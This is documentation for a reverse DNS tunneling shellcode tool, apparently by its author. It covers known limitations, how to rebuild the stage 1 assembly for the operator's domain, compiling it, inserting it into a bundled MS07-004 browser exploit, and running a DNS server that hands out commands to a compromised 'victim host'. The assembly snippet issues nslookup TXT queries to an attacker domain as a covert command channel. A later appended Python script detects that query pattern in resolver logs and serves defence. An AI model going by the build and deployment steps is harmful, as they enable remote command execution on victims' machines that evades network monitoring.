
Reverse DNS Tunneling Shellcode v0.3 Documentation

Current Limitations

stage 1 asm is currently hardcoded for tysblackhat.com
- need to make a generator program so that this is dynamic

stage 2 shellcode creates files on the desktop of the victim if it dies

issues exist for requestId numbers greater than 99

no WSAStartup, so it only works when injected into software that is already connected to the internet (Winsock already initialised)

sleep is hardcoded

GetProcAddress is hardcoded

the server dies periodically, but this is no big deal since the probes continue, so you can start it back up and keep sending commands

slow from the command line due to DNS

back slashes aren't escaped

shellcode is memory resident and is not persistent

Considerations

It is not a console. It is an interface to run a single command at a time.

No environment is carried between commands
- navigation is useless. Listing directories is done in one command.
- i.e. it is useless to cd to a directory since the next command starts at the desktop again
How To

1. Compile asc.c for alphanumeric encoding

    gcc -o asc asc.c

2. Modify the hardcoded domain in reverse-dns-shellcode-stage1-v03.asm

In future versions this will be automated via a generator program, as is already done for the stage 2 shellcode.
Towards the bottom you will find the following lines:

    GetCommandString:
    call GetCommandStringReturn
    db 'nslookup -q=TXT -timeout=9 OBZG6YTF.0000-0000.0000.0001.tysblackhat.comN'

Change the domain from "tysblackhat.com" to your domain.
Changing the length of the domain invalidates a couple of hardcoded values in the shellcode, which need to be updated to reflect the new length of the db string.
Locate the following lines and update the numbers based on the comments below:

    jmp GetCommandString
    GetCommandStringReturn:
    pop ecx                        ; ecx -> start of the db string above
    mov edx,0x0000000A
    mov [ecx + 71],dl              ; 71 is the length of the above db string without the "N" (the 0x0A overwrites the "N"). Update this to reflect your domain string length.
    lea edi,[ebp-606Ch]
    lea esi,[ecx]
    mov ecx,72                     ; Here we have 72. Similarly change this, but obviously add one to your value above.
    rep movsb
    mov dword [ebp-6070h],48h      ; 48h is the hex version of 72 ... Change your second value above to hex.
3. Compile the stage 1 shellcode

You need to have nasm, xxd and bash installed and in your path.
I am using:

    nasm version 2.03.01
    xxd version V1.10

If you have these then run the following:

    ./reverse-dns-shellcode-stage1-compiler-v03.sh reverse-dns-shellcode-stage1-v03.asm

This will produce the following files and will also output some of this to STDOUT:

    reverse-dns-shellcode-stage1-v03.bin
    reverse-dns-shellcode-stage1-v03.shellcode
    reverse-dns-shellcode-stage1-v03.unicode
    reverse-dns-shellcode-stage1-v03-ms07-004.html

4. Insert the shellcode into your exploit

reverse-dns-shellcode-stage1-v03-ms07-004.html is included as a sample exploit that automatically gets the shellcode inserted.

5. Start the Reverse DNS Tunneling Shellcode DNS Server

I created a start script for this:

    reverse-dns-shellcode-server-start-v03.sh

Edit this file to replace tysblackhat.com with your domain name, then run it.
This should drop you to an initial command prompt where you can enter your first command before you even send off your exploit.
This is to ensure that we don't waste any DNS probes from the victim host, so commands run immediately.
From here you basically send off your exploit and wait for the DNS Server to display "[Command Sent Over DNS]", which means it is go time!
You should now have a command prompt on your victim host tunneled over DNS.
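The stage 1 query string shown in step 2 also tells a defender what this tunnel looks like in resolver logs: a TXT lookup whose name is an alphanumeric data label, then four 4-digit labels (one of which carries the requestId the limitations section mentions), then the operator's zone. The following screening script is an added example and not part of the original tool; the log line format and the n1..n4 field names are assumptions.

```python
import re
from collections import Counter

# Constructed sample resolver log (not from the page): "client qtype qname"
SAMPLE_LOG = """\
10.0.0.5 TXT OBZG6YTF.0000-0000.0000.0001.example-attacker.test
10.0.0.5 TXT OBZG6YTF.0000-0000.0000.0002.example-attacker.test
10.0.0.5 A www.example.com
10.0.0.7 TXT _dmarc.example.com
10.0.0.5 TXT KRSXG5A.0000-0000.0001.0003.example-attacker.test
"""

# Shape of the stage 1 probe name: <alnum data>.NNNN-NNNN.NNNN.NNNN.<zone>
# (which numeric label is the requestId is not stated on the page, so the
# n1..n4 names here are an assumption)
TUNNEL_RE = re.compile(
    r"^(?P<data>[A-Z0-9]+)\."
    r"(?P<n1>\d{4})-(?P<n2>\d{4})\.(?P<n3>\d{4})\.(?P<n4>\d{4})\."
    r"(?P<zone>\S+)$",
    re.IGNORECASE,
)


def parse_line(line):
    """Split one 'client qtype qname' log line; trailing dot on qname dropped."""
    client, qtype, qname = line.split()
    return client, qtype.upper(), qname.rstrip(".")


def classify(line):
    """Return a finding for a TXT query matching the probe shape, else None."""
    client, qtype, qname = parse_line(line)
    if qtype != "TXT":          # the tunnel carries its channel in TXT lookups
        return None
    m = TUNNEL_RE.match(qname)
    if not m:
        return None
    return {"client": client, "zone": m["zone"].lower(),
            "data": m["data"], "n4": int(m["n4"])}


def scan(log_text):
    """Return all findings plus a per-(client, zone) count, to spot repeated probing."""
    findings = [f for f in (classify(l) for l in log_text.splitlines() if l.strip()) if f]
    per_source = Counter((f["client"], f["zone"]) for f in findings)
    return findings, per_source
```

A single match is weak evidence on its own; the repeated probes from one client to one zone that the limitations section describes are what the per-source count is there to surface.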
Enjoy and keep an eye out for later versions of the shellcode.
Ty Miller
www.projectshellcode.com